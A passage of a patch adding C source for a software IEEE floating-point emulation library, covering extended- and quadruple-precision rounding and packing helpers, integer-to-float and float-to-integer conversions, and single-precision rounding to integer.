&= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); + } + } + else { + if ( zSig0 == 0 ) zExp = 0; + } + return packFloatx80( zSign, zExp, zSig0 ); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent +| `zExp', and significand formed by the concatenation of `zSig0' and `zSig1', +| and returns the proper extended double-precision floating-point value +| corresponding to the abstract input. This routine is just like +| `roundAndPackFloatx80' except that the input significand does not have to be +| normalized. +*----------------------------------------------------------------------------*/ + +static floatx80 + normalizeRoundAndPackFloatx80( + int8 roundingPrecision, flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 + STATUS_PARAM) +{ + int8 shiftCount; + + if ( zSig0 == 0 ) { + zSig0 = zSig1; + zSig1 = 0; + zExp -= 64; + } + shiftCount = countLeadingZeros64( zSig0 ); + shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); + zExp -= shiftCount; + return + roundAndPackFloatx80( roundingPrecision, zSign, zExp, zSig0, zSig1 STATUS_VAR); + +} + +/*---------------------------------------------------------------------------- +| Returns the least-significant 64 fraction bits of the quadruple-precision +| floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint64_t extractFloat128Frac1( float128 a ) +{ + + return a.low; + +} + +/*---------------------------------------------------------------------------- +| Returns the most-significant 48 fraction bits of the quadruple-precision +| floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint64_t extractFloat128Frac0( float128 a ) +{ + + return a.high & LIT64( 0x0000FFFFFFFFFFFF ); + +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the quadruple-precision floating-point value +| `a'. +*----------------------------------------------------------------------------*/ + +static inline int32 extractFloat128Exp( float128 a ) +{ + + return ( a.high>>48 ) & 0x7FFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the quadruple-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat128Sign( float128 a ) +{ + + return a.high>>63; + +} + +/*---------------------------------------------------------------------------- +| Normalizes the subnormal quadruple-precision floating-point value +| represented by the denormalized significand formed by the concatenation of +| `aSig0' and `aSig1'. The normalized exponent is stored at the location +| pointed to by `zExpPtr'. The most significant 49 bits of the normalized +| significand are stored at the location pointed to by `zSig0Ptr', and the +| least significant 64 bits of the normalized significand are stored at the +| location pointed to by `zSig1Ptr'. +*----------------------------------------------------------------------------*/ + +static void + normalizeFloat128Subnormal( + uint64_t aSig0, + uint64_t aSig1, + int32 *zExpPtr, + uint64_t *zSig0Ptr, + uint64_t *zSig1Ptr + ) +{ + int8 shiftCount; + + if ( aSig0 == 0 ) { + shiftCount = countLeadingZeros64( aSig1 ) - 15; + if ( shiftCount < 0 ) { + *zSig0Ptr = aSig1>>( - shiftCount ); + *zSig1Ptr = aSig1<<( shiftCount & 63 ); + } + else { + *zSig0Ptr = aSig1<<shiftCount; + *zSig1Ptr = 0; + } + *zExpPtr = - shiftCount - 63; + } + else { + shiftCount = countLeadingZeros64( aSig0 ) - 15; + shortShift128Left( aSig0, aSig1, shiftCount, zSig0Ptr, zSig1Ptr ); + *zExpPtr = 1 - shiftCount; + } + +} + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', the exponent `zExp', and the significand formed +| by the concatenation of `zSig0' and `zSig1' into a quadruple-precision +| floating-point value, returning the result. After being shifted into the +| proper positions, the three fields `zSign', `zExp', and `zSig0' are simply +| added together to form the most significant 32 bits of the result. This +| means that any integer portion of `zSig0' will be added into the exponent. +| Since a properly normalized significand will have an integer portion equal +| to 1, the `zExp' input should be 1 less than the desired result exponent +| whenever `zSig0' and `zSig1' concatenated form a complete, normalized +| significand. +*----------------------------------------------------------------------------*/ + +static inline float128 + packFloat128( flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 ) +{ + float128 z; + + z.low = zSig1; + z.high = ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<48 ) + zSig0; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and extended significand formed by the concatenation of `zSig0', `zSig1', +| and `zSig2', and returns the proper quadruple-precision floating-point value +| corresponding to the abstract input. Ordinarily, the abstract value is +| simply rounded and packed into the quadruple-precision format, with the +| inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded to +| a subnormal number, and the underflow and inexact exceptions are raised if +| the abstract input cannot be represented exactly as a subnormal quadruple- +| precision floating-point number. +| The input significand must be normalized or smaller. If the input +| significand is not normalized, `zExp' must be 0; in that case, the result +| returned is a subnormal number, and it must not require rounding. In the +| usual case that the input significand is normalized, `zExp' must be 1 less +| than the ``true'' floating-point exponent. The handling of underflow and +| overflow follows the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float128 + roundAndPackFloat128( + flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2 STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment = 0, isTiny; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)zSig2 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && zSig2; + break; + case float_round_down: + increment = zSign && zSig2; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if ( 0x7FFD <= (uint32_t) zExp ) { + if ( ( 0x7FFD < zExp ) + || ( ( zExp == 0x7FFD ) + && eq128( + LIT64( 0x0001FFFFFFFFFFFF ), + LIT64( 0xFFFFFFFFFFFFFFFF ), + zSig0, + zSig1 + ) + && increment + ) + ) { + float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); + if ( ( roundingMode == float_round_to_zero ) + || ( zSign && ( roundingMode == float_round_up ) ) + || ( ! zSign && ( roundingMode == float_round_down ) ) + ) { + return + packFloat128( + zSign, + 0x7FFE, + LIT64( 0x0000FFFFFFFFFFFF ), + LIT64( 0xFFFFFFFFFFFFFFFF ) + ); + } + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( zExp < 0 ) { + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloat128(zSign, 0, 0, 0); + } + isTiny = + ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) + || ( zExp < -1 ) + || ! increment + || lt128( + zSig0, + zSig1, + LIT64( 0x0001FFFFFFFFFFFF ), + LIT64( 0xFFFFFFFFFFFFFFFF ) + ); + shift128ExtraRightJamming( + zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 ); + zExp = 0; + if ( isTiny && zSig2 ) float_raise( float_flag_underflow STATUS_VAR); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)zSig2 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && zSig2; + break; + case float_round_down: + increment = zSign && zSig2; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + } + } + if ( zSig2 ) STATUS(float_exception_flags) |= float_flag_inexact; + if ( increment ) { + add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 ); + zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven ); + } + else { + if ( ( zSig0 | zSig1 ) == 0 ) zExp = 0; + } + return packFloat128( zSign, zExp, zSig0, zSig1 ); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand formed by the concatenation of `zSig0' and `zSig1', and +| returns the proper quadruple-precision floating-point value corresponding +| to the abstract input. This routine is just like `roundAndPackFloat128' +| except that the input significand has fewer bits and does not have to be +| normalized. In all cases, `zExp' must be 1 less than the ``true'' floating- +| point exponent. +*----------------------------------------------------------------------------*/ + +static float128 + normalizeRoundAndPackFloat128( + flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 STATUS_PARAM) +{ + int8 shiftCount; + uint64_t zSig2; + + if ( zSig0 == 0 ) { + zSig0 = zSig1; + zSig1 = 0; + zExp -= 64; + } + shiftCount = countLeadingZeros64( zSig0 ) - 15; + if ( 0 <= shiftCount ) { + zSig2 = 0; + shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); + } + else { + shift128ExtraRightJamming( + zSig0, zSig1, 0, - shiftCount, &zSig0, &zSig1, &zSig2 ); + } + zExp -= shiftCount; + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 32-bit two's complement integer `a' +| to the single-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 int32_to_float32(int32_t a STATUS_PARAM) +{ + flag zSign; + + if ( a == 0 ) return float32_zero; + if ( a == (int32_t) 0x80000000 ) return packFloat32( 1, 0x9E, 0 ); + zSign = ( a < 0 ); + return normalizeRoundAndPackFloat32( zSign, 0x9C, zSign ? - a : a STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 32-bit two's complement integer `a' +| to the double-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 int32_to_float64(int32_t a STATUS_PARAM) +{ + flag zSign; + uint32 absA; + int8 shiftCount; + uint64_t zSig; + + if ( a == 0 ) return float64_zero; + zSign = ( a < 0 ); + absA = (zSign && (a != 0x80000000)) ? - a : a; + shiftCount = countLeadingZeros32( absA ) + 21; + zSig = absA; + return packFloat64( zSign, 0x432 - shiftCount, zSig<<shiftCount ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 32-bit two's complement integer `a' +| to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 int32_to_floatx80(int32_t a STATUS_PARAM) +{ + flag zSign; + uint32 absA; + int8 shiftCount; + uint64_t zSig; + + if ( a == 0 ) return packFloatx80( 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a != 0x80000000) ? - a : a; + shiftCount = countLeadingZeros32( absA ) + 32; + zSig = absA; + return packFloatx80( zSign, 0x403E - shiftCount, zSig<<shiftCount ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 32-bit two's complement integer `a' to +| the quadruple-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 int32_to_float128(int32_t a STATUS_PARAM) +{ + flag zSign; + uint32 absA; + int8 shiftCount; + uint64_t zSig0; + + if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a!= 0x80000000) ? - a : a; + shiftCount = countLeadingZeros32( absA ) + 17; + zSig0 = absA; + return packFloat128( zSign, 0x402E - shiftCount, zSig0<<shiftCount, 0 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' +| to the single-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 int64_to_float32(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + + if ( a == 0 ) return float32_zero; + zSign = ( a < 0 ); + absA = (zSign && a != 0x8000000000000000ULL) ? - a : a; + shiftCount = countLeadingZeros64( absA ) - 40; + if ( 0 <= shiftCount ) { + return packFloat32( zSign, 0x95 - shiftCount, (uint32_t)(absA<<shiftCount) ); + } + else { + shiftCount += 7; + if ( shiftCount < 0 ) { + shift64RightJamming( absA, - shiftCount, &absA ); + } + else { + absA <<= shiftCount; + } + return roundAndPackFloat32( zSign, 0x9C - shiftCount, (uint32_t)absA STATUS_VAR ); + } + +} + +float32 uint64_to_float32(uint64_t a STATUS_PARAM) +{ + int8 shiftCount; + + if ( a == 0 ) return float32_zero; + shiftCount = countLeadingZeros64( a ) - 40; + if ( 0 <= shiftCount ) { + return packFloat32(0, 0x95 - shiftCount, (uint32_t)(a<<shiftCount)); + } + else { + shiftCount += 7; + if ( shiftCount < 0 ) { + shift64RightJamming( a, - shiftCount, &a ); + } + else { + a <<= shiftCount; + } + return roundAndPackFloat32(0, 0x9C - shiftCount, (uint32_t)a STATUS_VAR); + } +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' +| to the double-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 int64_to_float64(int64_t a STATUS_PARAM) +{ + flag zSign; + + if ( a == 0 ) return float64_zero; + if ( a == (int64_t) LIT64( 0x8000000000000000 ) ) { + return packFloat64( 1, 0x43E, 0 ); + } + zSign = ( a < 0 ); + return normalizeRoundAndPackFloat64( zSign, 0x43C, zSign ? - a : a STATUS_VAR ); + +} + +float64 uint64_to_float64(uint64_t a STATUS_PARAM) +{ + int exp = 0x43C; + + if (a == 0) { + return float64_zero; + } + if ((int64_t)a < 0) { + shift64RightJamming(a, 1, &a); + exp += 1; + } + return normalizeRoundAndPackFloat64(0, exp, a STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' +| to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 int64_to_floatx80(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + + if ( a == 0 ) return packFloatx80( 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a != 0x8000000000000000ULL) ? - a : a; + shiftCount = countLeadingZeros64( absA ); + return packFloatx80( zSign, 0x403E - shiftCount, absA<<shiftCount ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' to +| the quadruple-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 int64_to_float128(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + int32 zExp; + uint64_t zSig0, zSig1; + + if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a!= 0x8000000000000000ULL) ? - a : a; + shiftCount = countLeadingZeros64( absA ) + 49; + zExp = 0x406E - shiftCount; + if ( 64 <= shiftCount ) { + zSig1 = 0; + zSig0 = absA; + shiftCount -= 64; + } + else { + zSig1 = absA; + zSig0 = 0; + } + shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); + return packFloat128( zSign, zExp, zSig0, zSig1 ); + +} + +float128 uint64_to_float128(uint64_t a STATUS_PARAM) +{ + if (a == 0) { + float128 zero = {0}; + return zero; + } + return normalizeRoundAndPackFloat128(0, 0x406E, a, 0 STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 32-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 float32_to_int32( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( ( aExp == 0xFF ) && aSig ) aSign = 0; + if ( aExp ) aSig |= 0x00800000; + shiftCount = 0xAF - aExp; + aSig64 = aSig; + aSig64 <<= 32; + if ( 0 < shiftCount ) shift64RightJamming( aSig64, shiftCount, &aSig64 ); + return roundAndPackInt32( aSign, aSig64 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 32-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int32 float32_to_int32_round_to_zero( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + int32_t z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0x9E; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xCF000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) return 0x7FFFFFFF; + } + return (int32_t) 0x80000000; + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig = ( aSig | 0x00800000 )<<8; + z = aSig>>( - shiftCount ); + if ( (uint32_t) ( aSig<<( shiftCount & 31 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 16-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int_fast16_t float32_to_int16_round_to_zero(float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + int32 z; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0x8E; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xC7000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return 0x7FFF; + } + } + return (int32_t) 0xffff8000; + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return 0; + } + shiftCount -= 0x10; + aSig = ( aSig | 0x00800000 )<<8; + z = aSig>>( - shiftCount ); + if ( (uint32_t) ( aSig<<( shiftCount & 31 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) { + z = - z; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int64 float32_to_int64( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64, aSigExtra; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = 0xBE - aExp; + if ( shiftCount < 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + if ( aExp ) aSig |= 0x00800000; + aSig64 = aSig; + aSig64 <<= 40; + shift64ExtraRightJamming( aSig64, 0, shiftCount, &aSig64, &aSigExtra ); + return roundAndPackInt64( aSign, aSig64, aSigExtra STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| unsigned integer is returned. Otherwise, if the conversion overflows, the +| largest unsigned integer is returned. If the 'a' is negative, the result +| is rounded and zero is returned; values that do not round to zero will +| raise the inexact exception flag. +*----------------------------------------------------------------------------*/ + +uint64 float32_to_uint64(float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64, aSigExtra; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac(a); + aExp = extractFloat32Exp(a); + aSign = extractFloat32Sign(a); + if ((aSign) && (aExp > 126)) { + float_raise(float_flag_invalid STATUS_VAR); + if (float32_is_any_nan(a)) { + return LIT64(0xFFFFFFFFFFFFFFFF); + } else { + return 0; + } + } + shiftCount = 0xBE - aExp; + if (aExp) { + aSig |= 0x00800000; + } + if (shiftCount < 0) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + + aSig64 = aSig; + aSig64 <<= 40; + shift64ExtraRightJamming(aSig64, 0, shiftCount, &aSig64, &aSigExtra); + return roundAndPackUint64(aSign, aSig64, aSigExtra STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. If +| `a' is a NaN, the largest unsigned integer is returned. Otherwise, if the +| conversion overflows, the largest unsigned integer is returned. If the +| 'a' is negative, the result is rounded and zero is returned; values that do +| not round to zero will raise the inexact flag. +*----------------------------------------------------------------------------*/ + +uint64 float32_to_uint64_round_to_zero(float32 a STATUS_PARAM) +{ + int64_t v; + signed char current_rounding_mode = STATUS(float_rounding_mode); + set_float_rounding_mode(float_round_to_zero STATUS_VAR); + v = float32_to_uint64(a STATUS_VAR); + set_float_rounding_mode(current_rounding_mode STATUS_VAR); + return v; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. If +| `a' is a NaN, the largest positive integer is returned. Otherwise, if the +| conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int64 float32_to_int64_round_to_zero( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64; + int64 z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0xBE; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xDF000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig64 = aSig | 0x00800000; + aSig64 <<= 40; + z = aSig64>>( - shiftCount ); + if ( (uint64_t) ( aSig64<<( shiftCount & 63 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the double-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float32_to_float64( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloat64( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat64( aSign, 0x7FF, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat64( aSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + return packFloat64( aSign, aExp + 0x380, ( (uint64_t) aSig )<<29 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 float32_to_floatx80( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloatx80( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + aSig |= 0x00800000; + return packFloatx80( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<40 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the double-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float32_to_float128( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloat128( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat128( aSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + return packFloat128( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<25, 0 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the single-precision floating-point value `a' to an integer, and +| returns the result as a single-precision floating-point value. The +| operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float32_round_to_int( float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint32_t lastBitMask, roundBitsMask; + uint32_t z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aExp = extractFloat32Exp( a ); + if ( 0x96 <= aExp ) { + if ( ( aExp == 0xFF ) && extractFloat32Frac( a ) ) { + return propagateFloat32NaN( a, a STATUS_VAR ); + } + return a; + } + if ( aExp <= 0x7E ) { + if ( (uint32_t) ( float32_val(a)<<1 ) == 0 ) return a; + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloat32Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x7E ) && extractFloat32Frac( a ) ) { + return packFloat32( aSign, 0x7F, 0 ); + } + break; + case float_round_ties_away: + if (aExp == 0x7E) { + return packFloat32(aSign, 0x7F, 0); + } + break; + case float_round_down: + return make_float32(aSign ? 0xBF800000 : 0); + case float_round_up: + return make_float32(aSign ? 0x80000000 : 0x3F800000); + } + return packFloat32( aSign, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x96 - aExp; + roundBitsMask = lastBitMask - 1; + z = float32_val(a); + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z += lastBitMask>>1; + if ((z & roundBitsMask) == 0) { + z &= ~lastBitMask; + } + break; + case float_round_ties_away: + z += lastBitMask >> 1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloat32Sign(make_float32(z))) { + z += roundBitsMask; + } + break; + case float_round_down: + if (extractFloat32Sign(make_float32(z))) { + z += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z &= ~ roundBitsMask; + if ( z != float32_val(a) ) STATUS(float_exception_flags) |= float_flag_inexact; + return make_float32(z); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the single-precision +| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated +| before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float32 addFloat32Sigs( float32 a, float32 b, flag zSign STATUS_PARAM) +{ + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + expDiff = aExp - bExp; + aSig <<= 6; + bSig <<= 6; + if ( 0 < expDiff ) { + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 